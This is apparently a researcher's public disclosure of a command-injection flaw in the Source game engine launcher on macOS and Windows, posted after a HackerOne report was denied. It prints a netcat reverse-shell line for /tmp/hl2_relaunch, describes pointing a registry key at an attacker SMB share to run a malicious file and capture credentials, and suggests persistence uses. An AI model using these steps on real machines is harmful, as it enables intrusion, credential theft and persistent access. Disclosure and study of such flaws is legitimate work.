Code Execution within Source Engine Game
CS:GO BuildID: 4937372 -> Current
TF2 BuildID: 4871679 -> Current
Garry’s Mod BuildID: 4803834 -> Current
Half Life 2 BuildID: 4233302 - > Current
Note: this vulnerability seems to date back further then the listed build numbers, however i have only tested back to them
This seems to be a issue within the source engine itself and should be present within all source games. However I have only tested the games listed above.
TL;DR Within MacOS place
";nc -e /bin/bash ip port"(or whatever you want for shell) into
/tmp/hl2_relaunch, open and close CS:GO and you have a shell on MacOS as whoever runs the game. On Windows add a registry key named
Relaunch URL to
Computer\HKEY_CURRENT_USER\Software\Valve\Source, however we can only call programs, thankfully we can use SMB/Any UNC Path to call a remote file(and get creds while were at it), so set it to \\ip\share\file and boom
However on line 98, the file is defined for OSX
On OSX, the launcher checks to see if the file ‘/tmp/hl2_relaunch’ exists, if it does then it creates the szCMD variable. If the file has stuff within it(it 99.9% of the time will), then it will add ‘open’ too the start and send it out as a system call. The issue with this is that their is no input validation. Meaning as I showed before, we can just add
; and it’ll execute anything we wish after.
For Windows, it checks to see if the registry key HKEY_Current_User\Software\Valve\Source, exists, then if it does if ReLaunch URL Exists within it, if it does call the ShellExecute Open function with the value of the registry key(Docs for shell execute here), this means itll run a executable, or open the attached program. and since the values “0, 0” are set we are unable to add parameters. However we are able to specify a remote SMB Path, so if we set the registry key to a SMB server we control containing a malicious file (I tested with a .bat running a rev shell command), using this method we can also fetch users credentials.
This issues was reported to Valve on 22/04/2020 via HackerOne and denied due to
Which, I find very confusing, since that line of the scope was taken from the following
Which states RCE Must follow those 3 statements, not a LPE, or a Local Arbitrary Code Execution(depends on how you classify the bug). While I do see that this bug would have a low broader impact, in certain scenarios it could have a more serious impacts. As a example a dev could self-host a web server on their machine and it could be compromised, this bug would allow them to place the file in /tmp as www-data and get a shell as the user who plays CS:GO(or any source game) next, or this could also be used as a way to maintain access to a box. Set the file in the tmp and if you lose the shell just wait for them to play CS:GO(or any source game). Anyways, that is why this is being disclosed this way instead of via Hackerone.